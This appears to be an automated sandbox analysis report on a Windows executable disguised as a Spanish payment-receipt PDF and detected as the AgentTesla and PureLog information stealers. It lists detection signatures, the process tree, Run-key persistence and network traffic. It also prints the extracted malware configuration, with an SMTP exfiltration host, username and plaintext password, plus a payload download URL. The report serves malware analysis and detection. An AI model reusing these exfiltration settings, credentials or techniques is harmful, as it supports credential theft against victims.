Windows Analysis Report
JUSTIFICANTE DE PAGO CF.pdf.exe

Overview

General Information

Sample name: JUSTIFICANTE DE PAGO CF.pdf.exe
Analysis ID: 1396479
MD5: 5d9f0ca0e2b0e41f30a1cce0b002484b
SHA1: 1eb77e3633dcfbfd2163a8e9a0c0a3f2588c0b14
SHA256: 344bb8ae2d9afbf9f666a844f6e9a7606eaa226a0383b84cf173f0f3725fabff
Tags: exe

Detection

AgentTesla, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected AgentTesla
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Reramvw.exe (PID: 7128 cmdline: "C:\Users\user\AppData\Roaming\Reramvw.exe" MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
    • Reramvw.exe (PID: 5844 cmdline: C:\Users\user\AppData\Roaming\Reramvw.exe MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
    • Reramvw.exe (PID: 6300 cmdline: C:\Users\user\AppData\Roaming\Reramvw.exe MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
  • repeat.exe (PID: 7056 cmdline: "C:\Users\user\AppData\Roaming\repeat\repeat.exe" MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
    • repeat.exe (PID: 5292 cmdline: C:\Users\user\AppData\Roaming\repeat\repeat.exe MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
  • Reramvw.exe (PID: 6472 cmdline: "C:\Users\user\AppData\Roaming\Reramvw.exe" MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
    • Reramvw.exe (PID: 6152 cmdline: C:\Users\user\AppData\Roaming\Reramvw.exe MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
  • repeat.exe (PID: 6844 cmdline: "C:\Users\user\AppData\Roaming\repeat\repeat.exe" MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
    • repeat.exe (PID: 2360 cmdline: C:\Users\user\AppData\Roaming\repeat\repeat.exe MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.wassadadvogados.com.br", "Username": "pinchoo@wassadadvogados.com.br", "Password": "{&0etBH,BRpf"}
Source | Rule | Description | Author | Strings
JUSTIFICANTE DE PAGO CF.pdf.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\repeat\repeat.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Roaming\Reramvw.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source | Rule | Description | Author | Strings
0000000B.00000002.2413286495.00000000037CB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000003.00000002.2156621801.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000003.00000002.2152875189.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000003.00000002.2152875189.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1992000502.0000000003308000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.3383018.0.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
7.2.repeat.exe.2bf2c1c.1.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
3.2.Reramvw.exe.3cd3160.7.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
3.2.Reramvw.exe.3bbb5d0.2.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.0.JUSTIFICANTE DE PAGO CF.pdf.exe.c50000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems), Data: Command: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, CommandLine: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, NewProcessName: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, OriginalFileName: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6844, ProcessCommandLine: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, ProcessId: 2360, ProcessName: JUSTIFICANTE DE PAGO CF.pdf.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\Reramvw.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, ProcessId: 2360, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Reramvw
Source: Network Connection, Author: frack113, Data: DestinationIp: 191.252.141.106, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, Initiated: true, ProcessId: 7164, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49708
No Snort rule has matched

AV Detection

Source: JUSTIFICANTE DE PAGO CF.pdf.exe, Avira: detected
Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe, Avira: detection malicious, Label: HEUR/AGEN.1363658
Source: C:\Users\user\AppData\Roaming\Reramvw.exe, Avira: detection malicious, Label: HEUR/AGEN.1363658
Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.wassadadvogados.com.br", "Username": "pinchoo@wassadadvogados.com.br", "Password": "{&0etBH,BRpf"}
Source: C:\Users\user\AppData\Roaming\Reramvw.exe, ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe, ReversingLabs: Detection: 34%
Source: JUSTIFICANTE DE PAGO CF.pdf.exe, ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Reramvw.exe, Joe Sandbox ML: detected
Source: JUSTIFICANTE DE PAGO CF.pdf.exe, Joe Sandbox ML: detected
Source: JUSTIFICANTE DE PAGO CF.pdf.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: JUSTIFICANTE DE PAGO CF.pdf.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: protobuf-net.pdbSHA256}Lq source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: protobuf-net.pdb source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmp

Networking

Source: Yara match, File source: JUSTIFICANTE DE PAGO CF.pdf.exe, type: SAMPLE
Source: Yara match, File source: 0.0.JUSTIFICANTE DE PAGO CF.pdf.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: C:\Users\user\AppData\Roaming\repeat\repeat.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\Reramvw.exe, type: DROPPED
Source: global traffic, TCP traffic: 192.168.2.5:49708 -> 191.252.141.106:587
Source: global traffic, HTTP traffic detected: GET /HCHP.pdf HTTP/1.1, Host: qu.ax, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /recepticle.aspx HTTP/1.1, Content-Type: application/x-www-form-urlencoded, Host: www.example.com, Content-Length: 25, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /recepticle.aspx HTTP/1.1, Host: www.example.com
Source: Joe Sandbox View, IP Address: 93.184.216.34
Source: Joe Sandbox View, IP Address: 191.252.141.106
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, DNS traffic detected: queries for: www.example.com
Source: unknown, HTTP traffic detected: POST /recepticle.aspx HTTP/1.1, Content-Type: application/x-www-form-urlencoded, Host: www.example.com, Content-Length: 25, Expect: 100-continue, Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:08:48 GMTExpires: Wed, 28 Feb 2024 20:08:48 GMTServer: EOS (vny/0451)Content-Length: 433Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6f 62 6a 2e 61 63 2e 62 63 6f 6e 2e 65 63 64 6e 73 2e 6e 65 74 2f 65 63 5f 74 70 6d 5f 62 63 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 366073Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:08:50 GMTExpires: Wed, 28 Feb 2024 20:08:50 GMTLast-Modified: Sat, 17 Feb 2024 14:27:37 GMTServer: ECS (nyb/1D29)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 
68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:04 GMTExpires: Wed, 28 Feb 2024 20:09:04 GMTServer: EOS (vny/0451)Content-Length: 433Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6f 62 6a 2e 61 63 2e 62 63 6f 6e 2e 65 63 64 6e 73 2e 6e 65 74 2f 65 63 5f 74 70 6d 5f 62 63 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 366089Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:06 GMTExpires: Wed, 28 Feb 2024 20:09:06 GMTLast-Modified: Sat, 17 Feb 2024 14:27:37 GMTServer: ECS (nyb/1D29)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 
68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:12 GMTExpires: Wed, 28 Feb 2024 20:09:12 GMTServer: EOS (vny/0451)Content-Length: 433Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 